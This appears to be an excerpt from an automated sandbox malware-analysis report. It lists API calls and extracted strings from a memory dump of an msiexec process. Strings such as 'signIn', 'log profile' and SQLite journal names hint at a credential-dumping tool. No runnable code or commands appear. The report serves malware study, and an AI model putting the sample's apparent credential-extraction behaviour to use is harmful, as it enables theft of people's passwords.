                                                                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                        • API String ID: 1297977491-2001300268
                                                                                        APIs
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                        • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                        • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                        • String ID: ($d
                                                                                        • API String ID: 1140211610-1915259565
                                                                                        APIs
                                                                                        • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                        • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                        • GetLastError.KERNEL32 ref: 004178FB
                                                                                        • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                        Similarity
                                                                                        • API ID: File$ErrorLastLockSleepUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 3015003838-0
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00407E44
                                                                                        • memset.MSVCRT ref: 00407E5B
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                        • wcscpy.MSVCRT ref: 00407F10
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                        Similarity
                                                                                        • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 59245283-0
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                        • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                        • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                        • API String ID: 3510742995-3273207271
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                        • memset.MSVCRT ref: 00413ADC
                                                                                        • memset.MSVCRT ref: 00413AEC
                                                                                          • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                        • memset.MSVCRT ref: 00413BD7
                                                                                        • wcscpy.MSVCRT ref: 00413BF8
                                                                                        • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                        • String ID: 3A
                                                                                        • API String ID: 3300951397-293699754
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                        • wcscpy.MSVCRT ref: 0040D1B5
                                                                                          • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                          • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                        • wcslen.MSVCRT ref: 0040D1D3
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                        • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                        • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                        • String ID: strings
                                                                                        • API String ID: 3166385802-3030018805
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0041249C
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                        • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                        • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                        • wcscpy.MSVCRT ref: 004125A0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                        • String ID: r!A
                                                                                        • API String ID: 2791114272-628097481
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                        • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                        • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                        • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                        • String ID: BIN
                                                                                        • API String ID: 1668488027-1015027815
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00411AF6
                                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                        • wcsrchr.MSVCRT ref: 00411B14
                                                                                        • wcscat.MSVCRT ref: 00411B2E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                        • String ID: AE$.cfg$General$EA
                                                                                        • API String ID: 776488737-1622828088
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040D8BD
                                                                                        • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                        • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                        • memset.MSVCRT ref: 0040D906
                                                                                        • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                        • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                          • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                          • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                        • String ID: sysdatetimepick32
                                                                                        • API String ID: 1028950076-4169760276
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                        • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                        • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                        • memset.MSVCRT ref: 0041BA3D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID: -journal$-wal
                                                                                        • API String ID: 438689982-2894717839
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                        • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                        • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                          • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                          • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                        • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item$Dialog$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3975816621-0
                                                                                        APIs
                                                                                        • _wcsicmp.MSVCRT ref: 00444D09
                                                                                        • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                        • _wcsicmp.MSVCRT ref: 00444D33
                                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                          • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp$wcslen$_memicmp
                                                                                        • String ID: .save$http://$https://$log profile$signIn
                                                                                        • API String ID: 1214746602-2708368587
                                                                                        APIs
                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                        • memset.MSVCRT ref: 00405E33
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                        • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                        • String ID:
                                                                                        • API String ID: 2313361498-0
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                        • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                        • GetWindow.USER32(00000000), ref: 00405F80
                                                                                          • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                        • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                        • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                        • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                        • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                        • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMessageRectSend$Client
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                        • GetTickCount.KERNEL32 ref: 0041887D
                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                        • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                        Similarity
                                                                                        • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                        • String ID:
                                                                                        APIs
                                                                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                        • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                        • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                        • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                        • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID: gj
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                        • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                        • memset.MSVCRT ref: 00405ABB
                                                                                        • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                        • SetFocus.USER32(?), ref: 00405B76
                                                                                        Similarity
                                                                                        • API ID: MessageSend$FocusItemmemset
                                                                                        • String ID:
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _snwprintfwcscat
                                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                        • String ID: 0$6
                                                                                        APIs
                                                                                          • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                        • memset.MSVCRT ref: 00405455
                                                                                        • memset.MSVCRT ref: 0040546C
                                                                                        • memset.MSVCRT ref: 00405483
                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memset$memcpy$ErrorLast
                                                                                        • String ID: 6$\
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: AttributesErrorFileLastSleep$free
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                        • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                        • wcscpy.MSVCRT ref: 0040A0D9
                                                                                        • wcscat.MSVCRT ref: 0040A0E6
                                                                                        • wcscat.MSVCRT ref: 0040A0F5
                                                                                        • wcscpy.MSVCRT ref: 0040A107
                                                                                        Similarity
                                                                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                        • String ID:
                                                                                        APIs
                                                                                          • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                        • String ID: advapi32.dll
                                                                                        APIs
                                                                                        Strings
                                                                                        • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                        • <%s>, xrefs: 004100A6
                                                                                        Similarity
                                                                                        • API ID: memset$_snwprintf
                                                                                        • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcscat$_snwprintfmemset
                                                                                        • String ID: %2.2X
                                                                                        • API String ID: 2521778956-791839006
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _snwprintfwcscpy
                                                                                        • String ID: dialog_%d$general$menu_%d$strings
                                                                                        • API String ID: 999028693-502967061
                                                                                        APIs
                                                                                        • strlen.MSVCRT ref: 00408DFA
                                                                                          • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                        • memset.MSVCRT ref: 00408E46
                                                                                        • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                        • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                        • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memsetstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 2350177629-0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                        • API String ID: 2221118986-1606337402
                                                                                        APIs
                                                                                        • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                        • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                        • memset.MSVCRT ref: 00408FD4
                                                                                        • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                        • memset.MSVCRT ref: 00409042
                                                                                        • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                          • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                        • String ID:
                                                                                        • API String ID: 265355444-0
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004116FF
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                          • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                        • API String ID: 2618321458-3614832568
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFilefreememset
                                                                                        • String ID:
                                                                                        • API String ID: 2507021081-0
                                                                                        APIs
                                                                                        • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                        • malloc.MSVCRT ref: 00417524
